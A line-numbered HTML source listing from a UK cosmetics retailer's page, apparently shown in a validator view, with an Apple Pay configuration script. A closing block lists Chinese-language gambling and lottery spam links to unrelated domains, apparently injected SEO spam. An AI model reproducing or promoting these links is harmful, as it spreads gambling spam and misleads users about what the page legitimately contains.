  4971. dw.applepay = {"action":{"cancel":"https:\/\/www.elizabetharden.co.uk\/on\/demandware.store\/Sites-ElizabethArdenUK-Site\/en_GB\/__SYSTEM__ApplePay-Cancel","getRequest":"https:\/\/www.elizabetharden.co.uk\/on\/demandware.store\/Sites-ElizabethArdenUK-Site\/en_GB\/__SYSTEM__ApplePay-GetRequest","onshippingcontactselected":"https:\/\/www.elizabetharden.co.uk\/on\/demandware.store\/Sites-ElizabethArdenUK-Site\/en_GB\/__SYSTEM__ApplePay-ShippingContactSelected","onpaymentmethodselected":"https:\/\/www.elizabetharden.co.uk\/on\/demandware.store\/Sites-ElizabethArdenUK-Site\/en_GB\/__SYSTEM__ApplePay-PaymentMethodSelected","onvalidatemerchant":"https:\/\/www.elizabetharden.co.uk\/on\/demandware.store\/Sites-ElizabethArdenUK-Site\/en_GB\/__SYSTEM__ApplePay-ValidateMerchant","onpaymentauthorized":"https:\/\/www.elizabetharden.co.uk\/on\/demandware.store\/Sites-ElizabethArdenUK-Site\/en_GB\/__SYSTEM__ApplePay-PaymentAuthorized","prepareBasket":"https:\/\/www.elizabetharden.co.uk\/on\/demandware.store\/Sites-ElizabethArdenUK-Site\/en_GB\/__SYSTEM__ApplePay-PrepareBasket","onshippingmethodselected":"https:\/\/www.elizabetharden.co.uk\/on\/demandware.store\/Sites-ElizabethArdenUK-Site\/en_GB\/__SYSTEM__ApplePay-ShippingMethodSelected"},"inject":{"directives":[{"css":"dw-apple-pay-button","query":"ISAPPLEPAY","action":"replace","copy":true},{"css":"dw-apple-pay-button dw-apple-pay-cart ","query":"button[name=dwfrm_cart_checkoutCart]","action":"after","style":{"ref":"this","attr":["width","margin"]}}]}};
  4972. /* ]]> */
  4973. // -->
  4974. </script>
  4975. <script type="text/javascript" src="js/applepay.js" async="true"></script>
  4976. <div align="center">友情链接:
  4977. <a target="_blank" href='https://cpkj16688.com/' >极速赛车-幸运飞艇-澳洲幸运官方体彩,官网直播开奖结果&全天开奖记录</a>
  4978. <a target="_blank" href='http://dsn2122.com/' >极速赛车,澳洲幸运,幸运飞艇,飞艇</a>
  4979. <a target="_blank" href='http://www.ltyone.com/' >澳洲幸运5开奖结果查询官网|最新开奖直播视频|2022澳洲幸运五开奖号码</a>
  4980. <a target="_blank" href='http://dytt10.com/' >澳洲幸运10开奖</a>
  4981. <a target="_blank" href='http://132bt.com/' >澳洲幸运10开奖记录体彩</a>
  4982. <a target="_blank" href='http://www.cdkaichuang.com/' >澳洲幸运10历史开奖结果查询记录,现场直播,168开奖网澳洲10官网正规网站</a>
  4983. <a target="_blank" href='http://avav838ee.com/' >澳洲幸运5官方开奖结果体彩网</a>
  4984. <a target="_blank" href='http://catholictradition.net/' >澳洲幸运10官网开奖</a>
  4985. <a target="_blank" href='http://www.paulingcatalogue.org/' >澳洲幸运10开官网</a>
  4986. <a target="_blank" href='http://www.dartz.org/' >澳洲幸运5|澳洲幸运5官网开奖结果app+开奖记录|澳洲幸运5官方开奖结果体彩</a>
  4987. <a target="_blank" href='http://www.southcoastsegway.com/' >澳洲幸运8:澳洲幸运8开奖手机版-开奖结果查询-2022澳洲选八开奖视频</a>
  4988. <a target="_blank" href='http://www.iliuguang.com/' >澳洲幸运8手机版开奖结果</a>
  4989. <a target="_blank" href='http://huikacgj.com/' >澳洲幸运10开奖历史查询</a>
  4990. <a target="_blank" href='http://registeridea.com/' >2023澳洲幸运5开奖直播</a>
  4991. <a target="_blank" href='http://lsp1238.com/' >澳洲幸运10开奖历史</a>
  4992. <a target="_blank" href='http://www.forum-handphone.org/' >澳洲幸运5历史开奖结果体彩 &#x2d;澳洲5开奖历史查询&#x2d;澳洲幸运5官网开奖号码历史记录</a>
  4993. </div>
  4994. </body>
  4995.  
  4996. </html>
  4997.  
Copyright © 2002-9 Sam Ruby, Mark Pilgrim, Joseph Walton, and Phil Ringnalda